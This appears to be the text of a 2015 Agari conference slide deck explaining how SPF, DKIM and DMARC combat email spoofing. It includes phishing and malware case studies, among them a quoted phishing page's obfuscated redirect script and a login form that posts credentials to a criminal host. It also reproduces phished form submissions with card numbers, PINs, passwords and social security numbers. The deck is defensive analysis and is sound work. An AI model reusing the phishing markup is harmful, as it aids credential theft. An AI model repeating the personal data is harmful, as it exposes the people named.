© 2015 Agari

DMARC: A Weapon for the

Good Guys

April 10, 2015

© 2015 Agari

● EMPLOYEE #4 AT AGARI

● FIELD CTO

● MANAGED JP MORGAN CHASE’S IMPLEMENTATION OF DMARC

● PERSONALLY INVOLVED IN THE 2013 CITADEL TAKEDOWN EFFORT

● PREVIOUS ROLES:

- CTO of Brandmail Solutions, Concurro, and 365 Media

- Director, Strategic Projects at SAP

2

About your speaker: John Wilson

© 2015 Agari

● DMARC pioneer with PayPal, Google &

Yahoo!

● DMARC is only open email standard to

protect brands & consumers from fraud

● Founder & CEO Patrick Peterson built

SenderBase at IronPort, the first email

reputation service

● Engineering & Data Science team = deep

security heritage (IronPort, Cisco, Proofpoint, FireEye…)

Agari secures email as a primary channel of digital engagement,

eliminating brand abuse and consumer fraud

About Agari

© 2015 Agari

Agenda

• The Road to DMARC

• Technical Overview of SPF, DKIM, and DMARC

• Practical Examples & War Stories

• Q & A

4

© 2015 Agari

Wrap Up The Road to DMARC

© 2015 Agari 6

Email has a Fundamental Flaw

© 2015 Agari

Email Arms Race

7

IP Reputation - SenderBase (Cisco)

- SenderScore (Return Path)

- Blacklists (SORBS, SpamHaus)

Compromise a “Good” Server

Content Filtering - words/word combinations

- virus scanning

- URL scanning

- Fingerprinting

Obfuscation - “Vi@gra”, HTML

Modify binary until it isn’t detected

URL Shorteners, redirectors

Varying subjects & content

Append random blocks of text

Spamtraps Use real addresses

- captured in a breach

- harvested from an address book

© 2015 Agari 8

October 5, 2007: The PayPal/Yahoo Experiment

Idea:

Ask Yahoo to block non-authenticating

paypal.com messages.

Challenge:

How to ensure SPF and DomainKeys are

properly configured and working as expected?

- Yahoo supported PayPal with metadata

about all paypal.com email including

SPF/DK status

- PayPal used data to perfect SPF/DK

- Experiment proved that blocking messages

based on email authentication failures was

highly effective at preventing exact-domain

phishing

© 2015 Agari

● DMARC standard adds enforceable policy and a feedback loop to SPF & DKIM to combat

spoofed email, standardizing an effective solution at internet scale

● Email receivers have adopted DMARC – senders can leverage the standard to eliminate

phishing, restore consumer trust and allow targeted tracking of abuse

9

DMARC lets Everyone in on the Fun

DMARC RECEIVERS

DMARC PARTICIPANTS

DMARC.ORG PARTICIPANTS

© 2015 Agari

Wrap Up Technical Overview

10

© 2015 Agari 11

SPF: Sender Policy Framework

SPF Record for apple.com:

SPF authenticates the Envelope Domain

SPF breaks when messages are relayed/auto-forwarded

© 2015 Agari 12

DKIM: DomainKeys Identified Mail

DKIM is based on a cryptographic signature that is applied by the sending mail

server. The signature is added as a special message header:

The signing domain and the “selector” are used

by the receiving mail server to locate the public

key record in DNS.

The public key is then used to verify the signature. If the signature verifies, we

know that the signed headers and message body weren’t modified after signing.

© 2015 Agari

- Authenticates Network Path

- Authorized servers via DNS

- Very low operational cost

- Envelope / From Header Alignment required

- Authenticates Message Header/Body

- Publish public keys in DNS

- Requires digital signature on each

outbound message

- Signing / From Header Alignment required

13

DMARC Adds the Policy Layer to DKIM & SPF

Senders declare how

to process unauthenticated

email

Receivers provide feedback on

messages failing authentication

POLICY VISIBILITY

DKIM SPF

DMARC

© 2015 Agari 14

DMARC Record examples

Monitor policy example:

Quarantine policy example:

Reject policy example:

© 2015 Agari 15

DMARC XML Aggregate Data Example

© 2015 Agari 16

DMARC Forensic Feedback Example

Full Message Example (hotmail.com, outlook.com, etc.):

© 2015 Agari

Typical DMARC Policy Enforcement

Flow

17

From: john@example.com

To: bob@gmail.com

Subject: Urgent Alert!

Do SPF or DKIM prove this message was

sent by example.com?

Yes No

Is the content

OK?

What is example.com’s

DMARC policy? none

© 2015 Agari 18

DMARC Policy Enforcement in Action

© 2015 Agari 19

Limitations

- DMARC does not solve the “Friendly From” Problem:

- Inbox differentiation may help here

- If your mail provider doesn’t support DMARC, the bad stuff still gets through

- This is an ever-decreasing pool

- Herd Immunity

From: PayPal Security <paypay2182@hotmail.com

© 2015 Agari

Practical Examples & War Stories

© 2015 Agari

Typical Phishing Campaign

21

© 2015 Agari 22

DMARC Speeds Detection of Phishing Sites

© 2015 Agari

Sophisticated Phish

23

<script type="text/javascript">

window.location.href = "data:text/html;charset=utf-

8;base64,PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCA

xLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3AgDQogICANCiA

gICAgDQogICAgIA0KICAgDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW5

0PSIiPg0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IiI… LOTS

OF STUFF REMOVED …%3D”

</script>

The data: URI scheme is defined in RFC 2397

© 2015 Agari

Sophisticated Phish

24

© 2015 Agari

Sophisticated Phish

25

<form id="frmLogin" name="frmLogin" method="post"

action="http://e549a200372db9f3fcfac9f384e4ac2d.verifyinf

o.net/end.php" class="validationName:(login) validate:()"

autocomplete="off" enctype="application/x-www-form-

urlencoded">

The host collecting the phished data is

e549a200372db9f3fcfac9f384e4ac2d.verifyinfo.net.

But…you can’t simply scan the email to find the phishing site.

The end.php script didn’t contain any branding, so an automated scan wouldn’t

necessarily detect it as a phishing site.

© 2015 Agari

Would you like some malware with your

phish?

26

At this point, the phishing page tried to download a

malicious program posing as a Java update.

© 2015 Agari

Detecting Yesterday’s Threats Today!

27

Here’s a sample message

containing a malicious

attachment posing as a

voicemail message.

The attack ran from 8am –

10am UTC on February

26th, 2015.

© 2015 Agari

Detecting Yesterday’s Threats Today!

28

Here we see an email-based malware attack launched on February 26, 2015.

On the 26th, VirusTotal showed 0/57 detection rate!

This is my ESET signature update for February 27th, 2015, which now detects

Win32/Dridex.K, the malware variant sent in the February 26th campaign.

What a difference a day makes!

© 2015 Agari 29

Case Study: A Global Logistics Company

On April 10 – 18, 2014, criminals attempted to use a global logistics company’s

domain to send a malicious email containing a malware attachment. The attack

ran in 3 waves. Wave 1 used the same subject line, while waves 2 & 3 used

different shipment numbers.

Wave 1

50,120 hosts

Wave 2

34,877 hosts Wave 3

29,670 hosts

© 2015 Agari 30

Case Study: A Global Logistics Company

On April 10 – 18, criminals attempted to use ups.com to send a malicious email

containing a malware attachment. The attack ran in 3 waves. Wave 1 used the

same subject line, while waves 2 & 3 used different shipment numbers.

Wave 1

50,120 hosts

Wave 2

34,877 hosts Wave 3

29,670 hosts

© 2015 Agari

Mapping the attack

31

April 10 April 14 April 18

© 2015 Agari

Analysis Methodology

32

N

N

N

Relay

Botnet

© 2015 Agari

Attack Host Overlap*

33

2,996

5,576

2,100 1,480

18,860 10,784

11,618

Wave 1

Wave 2

Wave 3

Legend

* Not including known relays

© 2015 Agari 34

Detecting Infected Machines on your Network

© 2015 Agari 35

Send them Packing

50-100M fraudulent messages daily

Sent from t.co domain

DMARC reject policy published March 13, 2013

Abuse stopped completely 2 days later

Twitter was able to redeploy dozens of resources

© 2015 Agari 36

Nigerian eBay/PayPal scam foiled

© 2015 Agari

To: sdtbhn32@hotmail.com

From: formsub@bigbank.com

Subject: Form Submission

Disposition: REJECT

Source IP: 34.56.2.7

----------

fname: Joe

lname: Smith

cardn: 1432234202341232

pin: 2198

phone: 2125551523

addr1: 172 W. 48th St.

addr2: apt. 12

city: New York

state: NY

zip: 10036

email: jsmith74@alum.colgate.edu

username: jsmith74

password: colgateBS95

ssn: 034-21-9987

To: sdtbhn32@hotmail.com

From: formsub@bigbank.com

Subject: Form Submission

Dispostion: REJECT

Source IP: 34.56.2.7

----------

fname: Samuel

lname: Burroughs

cardn: 1432872198722443

pin: 8871

phone: 7162321023

addr1: 41 Pullman Ave.

addr2:

city: Rochester

state: NY

zip: 14615

email: sam@burroughs.org

username: samthepianoman

password: 11fingers

ssn: 414-54-0082

To: sdtbhn32@hotmail.com

From: formsub@bigbank.com

Subject: Form Submission

Disposition: REJECT

Source IP: 34.56.2.7

----------

fname: Raj

lname: Venkatasubramanian

cardn: 1432399864365132

pin: 3388

phone: 4089761023

addr1: 341 Kenmore Avenue

addr2:

city: Sunnyvale

state: CA

zip: 94086

email: rvenkata@ames.nasa.gov

username: rvenkat88

password: #shilpa$

ssn: 997-29-2101

14,000+ Total Submissions

~ 80% appeared to be real credentials

1. DMARC prevented delivery to the criminal

2. We knew the criminal’s email address

3. We knew the gullible bank clients

Not the Sharpest Tool in the Shed

37

© 2015 Agari

Herd Immunity?

38

© 2015 Agari

NY BBB Malware Campaign

39

Win32/TrojanDownloader.Waski.F trojan

© 2015 Agari

Attack was blocked by DMARC

40

© 2015 Agari

Wrap Up Twitter Account Takedowns

41

© 2015 Agari

The Value of a Twitter Account

42

© 2015 Agari

Using Twitter to Market an Illegal Pharmacy

43

Criminal

http://t.co/4UFzs4Tf07

© 2015 Agari

DMARC Forensic Reporting

44

© 2015 Agari

Threat Spike Alert

45

© 2015 Agari

Agari Sends t.co URLs to Twitter Abuse

Team

46

Twitter Abuse Team

1,600 URLs

© 2015 Agari

Twitter Investigates (And Takes

Action!)

47

1. Which accounts created the batch of t.co URLs?

2. What IP addresses were used to create those accounts?

3. What other accounts were created from those IP addresses?

4. Twitter removes the 1,600 t.co URLs

5. Twitter kills more than 20K user accounts

© 2015 Agari

Citadel Takedown

48

© 2015 Agari

Citadel Botnet Takedown: Agari’s Role

• Provided intelligence on Citadel root cause - phishing emails with

malicious URLs using web exploits for Citadel malware installation

– Data must be provided at Internet scale and in real-time

• Leveraged data on fraudulent email purporting to be from seven FS-

ISAC members sent to ~1B consumer mailboxes

• Submitted data on 3,762,605 emails from 4 March – 19 April 2013 to

Microsoft’s Digital Crimes Unit for analysis – 40% phish, 60% malware (Source: Microsoft)

Malicious Message Example 1

Malicious Message Example 2

49

© 2015 Agari

Data Flow: From Spam to Intelligence

1. Criminals send spoofed

messages purporting to be

from FS-ISAC members.

2. Receivers send forensic copies

of the spoofed messages to Agari

for analysis.

3. Agari sends forensic analysis

to the Microsoft DCU for further

analysis and correlation with

additional data.

50

© 2015 Agari

Filtering for Relevant Information

Filter for messages

based on member

domain, header

information,

authentication fails,

server origination

Find matching messages,

extract URLs, validate

owned & safe URLs,

create tuples for

remaining URLs

51

© 2015 Agari

Map Showing a Single Day’s Worth of Data

22,245 sources of spoofed messages purporting to be from

participating FS-ISAC member domains April 6, 2013

52

© 2015 Agari

Agari Supported Microsoft as a Declarant

• Agari provided a declaration in support of the TRO, Seizure Order, and

Order to Show Cause

53

© 2015 Agari 54

Resources

John Wilson (Happy to answer questions, present to your team, etc.)

jwilson@agari.com

Agari (Free DMARC resources)

http://agari.com/tools/

DMARC.org (You can find the specification here!)

http://www.dmarc.org

© 2015 Agari

Q & A

55

© 2015 Agari

Thank You!

56

© 2015 Agari

Backup Slides

57

© 2015 Agari

Provider Mailboxes Data Enforcement Msg Level

Yahoo! 320 Million ✔ ✔ ✔*

AT&T (via Yahoo) 8 Million ✔ ✔ ✔*

Rogers Communications (via Yahoo) 10 Million ✔ ✔ ✔*

Verizon (via Yahoo) 6 Million ✔ ✔ ✔*

Xtra, SBC, Ameritech, and additional Y! partners 20 Million ✔ ✔ ✔*

Google (Including 4.6M Apps Domains) 425 Million ✔ ✔ soon?

Microsoft (Hotmail, Live.com, Outlook.com, MSN) 380 Million ✔ ✔ ✔

AOL 50 Million ✔ ✔ 2014

Comcast 20 Million ✔ ✔

NetEase (163.com, 126.com, yeah.net) 510 Million ✔ ✔ ✔**

xs4all.nl 1 Million ✔ ✔

Mail.ru 300 Million ✔ ✔

Yandex 200 Million ✔

LinkedIn - ✔ ✔ ✔

Facebook 800 Million ✔

iCloud ? 2015 2015

Mercury.net (including 177 customer domains) ? ✔

* Via Private Channel

DMARC Receivers

58

* URLs only; via private channel ** Full body available upon request

© 2015 Agari

* Via Private Channel

Soon you too can be a DMARC Receiver!

59

Open Source Status

Sendmail (via OpenDMARC) production

Postfix (via OpenDMARC) production

Commercial Status

Google Apps production

Cisco/IronPort production

Proofpoint Summer 2015

Microsoft Office 365 Spring 2015

Symantec Cloud production

Message Systems (via OpenDMARC) production